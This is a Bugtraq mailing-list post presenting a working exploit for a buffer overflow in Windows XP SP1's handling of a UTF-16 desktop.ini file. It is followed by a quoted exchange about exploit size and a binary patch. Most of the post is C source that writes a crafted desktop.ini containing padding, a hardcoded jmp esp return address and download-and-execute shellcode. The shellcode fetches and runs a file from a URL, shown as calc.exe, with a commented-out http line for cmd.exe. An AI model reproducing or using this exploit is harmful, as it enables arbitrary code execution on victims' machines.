hello bugtraq, >From MSDN: ---cut--- DWORD GetPrivateProfileSection( LPCTSTR lpAppName, LPTSTR lpReturnedString, DWORD nSize, LPCTSTR lpFileName ); [skip] nSize [in] Size of the buffer pointed to by the lpReturnedString parameter, in TCHARs. Windows 95/98/Me: The maximum buffer size is 32,767 characters. ---cut--- It's a pity that even own Microsoft programmers do not know that for the unicode version of the function TCHAR will turn into a WCHAR. And we speak about using unicode everywhere.. Here is an exploit for Windows XP Service Pack 1. NOTE: the FFFE header which can be easily created with notepad is not a new technique. It has been already used for another vulnerability in IE (see http://security.nnov.ru/search/news.asp?binid=1782). NOTE: the directory "domain HELL team" has to be read-only, otherwise it won't work. NOTE: it's possible to exploit this bug using a network shared resource. It looks strange, but that doesn't work for samba shares. P.S. don't blame me i didn't use argv[] for parameters. it's your task to modify the source.. #include <fstream.h> #include <string.h> #include <stdio.h> #include <windows.h> #include <direct.h> char shellcode[]= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess. //by .einstein., dH team. "\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57" "\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74" "\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c" "\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff" "\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01" "\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00" "\x00\x51\x6a\x00\xff\xd0\x8d\x85\x23\x01\x00\x00\x50\x2e\xff\x95\x17\x01" "\x00\x00\x8d\x9d\x46\x01\x00\x00\x53\x50\x2e\x8b\x9d\x1b\x01\x00\x00\xff" "\xd3\x6a\x01\x8d\x8d\x4e\x01\x00\x00\x51\xff\xd0\x6a\x00\x2e\xff\x95\x1f" "\x01\x00\x00\xbb\x3c\x00\x00\x01\x8b\x0b\x81\xc1\x04\x00\x00\x01\x8d\x41" "\x14\x8b\x70\x68\x81\xc6\x00\x00\x00\x01\x8b\x06\x83\xf8\x00\x74\x51\x05" "\x00\x00\x00\x01\x8b\x56\x10\x81\xc2\x00\x00\x00\x01\x8b\x18\x8b\xcb\x81" "\xe1\x00\x00\x00\x80\x83\xf9\x00\x75\x2a\x81\xc3\x00\x00\x00\x01\x83\xc3" "\x02\x33\xc9\x32\x0b\xc1\xc1\x08\x43\x80\x3b\x00\x75\xf5\x3b\xcf\x75\x04" "\x8b\x3a\xeb\x16\x83\xc2\x04\x83\xc0\x04\x66\x83\x38\x00\x75\xc7\x83\xc6" "\x14\x8b\x10\x83\xfa\x00\x74\xa8\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x00\x55\x52\x4c\x4d\x4f\x4e" "\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65" "\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x5c\x7e\x57\x52\x46\x35\x36\x33" "\x34\x2e\x74\x6d\x70\x00"; char unicode_header[] = "\xFF\xFE"; char shell_header[] = "[.ShellClassInfo]\x0d\x0a"; #define OVERFLOW_LEN 0xA1C void main() { char url[]="file://c:/winnt/system32/calc.exe"; // char url[]="http://localhost/cmd.exe";; char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp) char path[500]; strcpy(path,"domain HELL team"); mkdir(path); SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); strcat(path,"\\desktop.ini"); ofstream out(path,ios::out+ios::binary); out.write(unicode_header,sizeof(unicode_header)-1); char zero = 0; for (int i=0;i<strlen(shell_header);i++) { out.write(&shell_header[i],1); out.write(&zero,1); } char pad = 'B'; for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1); char ebp[] = "1234"; out.write(ebp,4); char pad0 = 1; out.write(eip,4); char pad2 = 'C'; for (i=0;i<12;i++) out.write(&pad,1); out.write(shellcode,sizeof(shellcode)-1); out.write(url,sizeof(url)); int len = sizeof(shellcode)-1+sizeof(url); printf("shellcode+url: %d bytes\n",len); if (len%2 == 1) { printf("it's odd, so add 1 extra byte"); out.write(&pad2,1); } out.close(); } .einstein. domain HELL team. ES> Hi: >> -----Original Message----- >> From: nesumin [mailto:nesumin@softhome.net] >> I could create the exploit code on my Japanese Windows XP SP1. >> Perhaps, I think you can easily create the full exploit code >> by the following; >> >> * You can directly specify all overwritten data without thinking >> the UNICODE conversion if you create the "desktop.ini" as "UTF-16". >> (Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".) >> >> * You can get the code area of about 0xFF4 bytes. >> (Before and after RET address) ES> Obviously, I was playing in the ANSI world. Yes, I agree with you that the ES> exploit code written in RTF-16 can be created with a size of about 0xFF4 ES> bytes. A piece of 0xFF4 bytes long exploit code can do a lot. So, my ES> previous statement about limited exploitation of this buffer overflow is not ES> accurate. ES> It should be very easy to fix this bug. I manually modified the 800H to 400h ES> in shell32.dll to fix it. ES> Thanks a lot for your mention of BOM and UTF-16. Your concept is learnt and ES> programmatically reproduced with GetPrivateProfileSectionW. ES> Best regards ES> Peter Huang
